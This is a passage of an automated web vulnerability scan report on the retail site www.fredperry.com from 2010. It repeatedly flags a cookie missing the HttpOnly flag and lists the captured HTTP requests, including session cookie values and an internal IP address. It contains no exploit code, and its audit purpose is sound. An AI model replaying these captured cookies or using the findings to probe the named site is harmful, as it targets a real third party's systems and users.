There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /aboutus/careers/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /aboutus/security/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /aboutus/terms/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /accessories/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /accessories/men/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /accessories/women/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /arcade/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bags/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bags/men/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bags/women/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /catalogsearch/ajax/suggest/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /catalogsearch/result/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checkout/cart/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /contacts/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /customercare/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /customercare/delivery/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /customercare/deliverylate/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Late De ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /customercare/faq/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /customercare/information/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /customercare/ordertracking/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Order T ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /customercare/returns/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /footwear/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /footwear/men/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /footwear/women/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /heritage/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /home/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
ARPT=VVNKIYS192.168.100.195CKOLQ; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /js/index.php?c=auto&f=,prototype/prototype.js,prototype/validation.js,scriptaculous/builder.js,scriptaculous/effects.js,scriptaculous/dragdrop.js,scriptaculous/controls.js,scriptaculous/slider.js,varien/js.js,varien/form.js,varien/menu.js,mage/translate.js,mage/cookies.js,jquery/jquery-1.2.6.js,defacto/swfobject.js,defacto/jquery.jqzoom.js,defacto/jquery.cycle.all.pack.js,defacto/fp_general.js HTTP/1.1 Host: www.fredperry.com Proxy-Connection: keep-alive Referer: http://fredperry.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Set-Cookie: ARPT=VVNKIYS192.168.100.195CKOLQ; path=/ Date: Tue, 09 Nov 2010 15:45:19 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Cache-Control: must-revalidate Last-modified: Thu, 20 May 2010 11:06:23 +0000 Expires: Wed, 09 Nov 2011 15:45:19 +0000 Content-Type: text/javascript Content-Length: 399652
/* Prototype JavaScript framework, version 1.6.0.3 * (c) 2005-2008 Sam Stephenson * * Prototype is freely distributable under the terms of an MIT-style license. * For details, see the Prototype we ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /kids/kidswear/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /kids/my-first-fred-perry-shirt-overview/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /limited-edition/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /limited-edition/men/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /limited-edition/men/accessories/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /limited-edition/men/bags/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /limited-edition/men/blank-canvas-stussy/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /limited-edition/men/british-collectables/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /limited-edition/men/collaboration-raf-simons-centenary-outfit/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:09:21 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=7g1qu2sogdcde90e6i6ef81lg3; expires=Tue, 09-Nov-2010 17:09:21 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29369
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /limited-edition/men/collaboration-raf-simons/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /limited-edition/men/footwear/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /limited-edition/men/jackets/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /limited-edition/men/knitwear/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
